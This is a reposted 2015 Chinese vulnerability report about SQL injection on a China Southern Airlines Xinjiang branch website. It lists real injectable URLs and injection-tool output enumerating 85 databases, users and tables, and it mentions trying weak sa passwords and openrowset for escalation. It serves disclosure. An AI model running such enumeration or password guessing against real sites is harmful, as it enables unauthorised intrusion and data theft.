记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国南方航空某分站存在SQL注入漏洞

2015-12-27 04:00

漏洞存在于中国南方航空新疆分公司网站:http://www.xjair.com



注入点:http://www.xjair.com/articlelist.aspx?lmid=201111241132339582

http://www.xjair.com/article.aspx?id=201511021252236147

http://www.xjair.com/article.aspx?id=201510281636048110

http://www.xjair.com/article.aspx?id=201510221417206230

http://www.xjair.com/article.aspx?id=201510221416398861

http://www.xjair.com/article.aspx?id=201509101129137719

http://www.xjair.com/article.aspx?id=201509101125387361

...

共约62个点



取一个在神器里跑:http://www.xjair.com/article.aspx?id=201509101125387361



得到注入类型和配置参数:

1.png





暴库得到多达85的数据库:

code 区域
available databases [85]:

[*] account

[*] agent

[*] agent_cargo

[*] Airbooking

[*] airkcb

[*] AMC

[*] aspnetdb

[*] cargo

[*] ccb_ticket

[*] CEM

[*] CEM_cargo

[*] CEM_NEW

[*] CISP

[*] CRM

[*] CWLog

[*] cwys

[*] DeptWeb_BGS

[*] DeptWeb_Bwb

[*] DeptWeb_CWB

[*] DeptWeb_DF

[*] DeptWeb_DF_KS

[*] DeptWeb_HR

[*] DeptWeb_HY

[*] DeptWeb_KCB

[*] DeptWeb_SC

[*] DeptWeb_SCB

[*] DeptWeb_SCB_KS

[*] DeptWeb_SYGS

[*] DeptWeb_VOTE

[*] DeptWeb_XXGCB

[*] DFBG

[*] download_data

[*] e_learning

[*] ECS

[*] FCS

[*] fii_csm

[*] FOC

[*] FSS

[*] fxb

[*] gh

[*] gnp_mis

[*] hwsweb

[*] indexData

[*] info

[*] ip_add

[*] iso9000

[*] jx_appraise

[*] kaoshi_v3

[*] kczb

[*] kseat

[*] kseatuser

[*] kyshj

[*] lzzc

[*] master

[*] medical

[*] mis_public

[*] model

[*] msdb

[*] Mticket

[*] MyFlightBudgetDB

[*] new_medical

[*] OMS

[*] plane

[*] RAS

[*] renliziyuan

[*] rlzy

[*] sms_gtp

[*] southair

[*] tang_webservice

[*] Telegraph

[*] tempdb

[*] vacation

[*] VIPIS

[*] vote

[*] webdata

[*] WorkBook

[*] WorkCertificate

[*] WorkDBCenter

[*] WorkManualFinancing

[*] WorkManualFinancingCloseOff

[*] xjhkgs

[*] XjVote

[*] XjWeb

[*] xtgl_web

[*] xxjsb





当前数据库和用户:

code 区域
current database:    'XjWeb'

current user: 'xjweb'





数据库用户:

code 区域
database management system users [2]:

[*] sa

[*] xjweb





由于权限的限制,只能在XjWeb这个库里面跑,共11张表:

code 区域
foofoofoo

Dw_Lm

DW_Wz

DW_Fj

View_GetTk

View_GetWz

View_GetLmmc

View_GetTkHot

View_GetWzHot

D99_Tmp

Dw_LmLb





用手工试了下,sysobjects和syscolumns都被禁了,不能愉快的跨库了。

QQ截图20151111173407.png





最后试了下openrowset发现也有提权的可能:

QQ截图20151111173800.png





没精力爆破sa了,试了几个弱口令都不行。就到这儿吧。因为兴趣在其他的诸如account库上,所以也没深入XjWeb库。



虽然没什么收获,但好歹也是洞啊。

漏洞证明:

已证。

修复方案:

不会。

知识来源: www.wooyun.org/bugs/wooyun-2015-0153621

阅读:109341 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国南方航空某分站存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云